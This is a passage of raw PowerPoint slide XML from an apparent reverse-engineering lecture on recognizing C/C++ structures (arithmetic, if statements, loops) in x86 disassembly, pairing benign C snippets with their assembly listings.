                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>dword_40CF60</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00401019 push</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 ecx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0040101A push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offset aTotalD ;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>"total = %d\n"</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0040101F call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printf</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="520" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3924000" y="3965040"/>
            <a:ext cx="4835160" cy="310860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00401006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dword ptr [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp-4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], 1</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0040100D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dword ptr [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp-8</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], 2</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00401014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eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp-4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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00401017 add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eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp-8</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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0040101A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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp-4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], eax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0040101D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ecx, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp-4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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00401020 push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ecx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00401021 push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offset aTotalD ; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>"total = %d\n"</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00401026 call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printf</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Recognizing C/C++ structure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522"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Operation</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899640" y="1917000"/>
            <a:ext cx="1944000" cy="201204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int a = 0;</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int b = 1;</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a = a + 11;</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a = a - b;</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a--;</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b++;</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b = a % 3;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4140000" y="1340640"/>
            <a:ext cx="3888000" cy="886932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00401006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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>a</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0040100D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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], 1; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>b</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00401014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eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>]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00401017 add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eax, 0Bh</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0040101A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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], eax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0040101D mov</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 ecx, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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00401020 sub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ecx, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>]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00401023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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], ecx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00401026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edx, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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00401029 sub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edx, 1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0040102C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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], edx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0040102F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eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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00401032 add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eax, 1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00401035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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], eax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00401038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eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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0040103B cdq</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>edx:eax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0040103C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ecx, 3</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00401041 idiv</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ecx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00401043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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], edx</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Recognizing C/C++ structure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526"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If statement</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251640" y="2349000"/>
            <a:ext cx="3000600" cy="255996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int x = 1;</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int y = 2;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>if(x == y){</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printf("x equals y.\n");</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else{</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printf("x is not equal to y.\n");</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a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3780000" y="1794960"/>
            <a:ext cx="5256360" cy="420588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00401006 mov</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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], 1; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>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0040100D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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], 2; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>y</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00401014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eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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00401017 cmp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eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>]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0040101A </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>jnz </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>short loc_40102B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0040101C push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offset aXEqualsY_ ; "x equals y.\n"</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00401021 call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printf</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00401026 add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esp, 4 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>return to [ebp+var_8]</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00401029 jmp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short loc_401038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0040102B </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>loc_40102B</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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0040102B push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offset aXIsNotEqualToY ; "x is not equal to y.\n"</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00401030 call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printf</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9" name="Google Shape;937;p93" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="126000" y="3054240"/>
            <a:ext cx="3834360" cy="3678120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530"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Recognizing C/C++ structure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531"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Loop</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621000" y="1700640"/>
            <a:ext cx="2529000" cy="173700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int i;</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for(i=0; i&lt;100; i++)</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printf("i equals %d\n", i);</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a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4425840" y="1207440"/>
            <a:ext cx="4610160" cy="585180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00401004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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], 0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0040100B jmp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short loc_401016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0040100D loc_40100D:</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0040100D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eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>]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00401010 add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eax, 1</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00401013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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], eax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00401016 loc_401016:</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00401016 cmp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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>], 64h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0040101A jge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short loc_40102F </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0040101C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ecx, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a: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0040101F push</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 ecx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00401020 push</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 offset aID ; "i equals %d\n"</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00401025 call</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 printf</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0040102A add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esp, 8</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0040102D jmp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short loc_40100D</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0040102F loc_40102F:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>00401034 xor </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
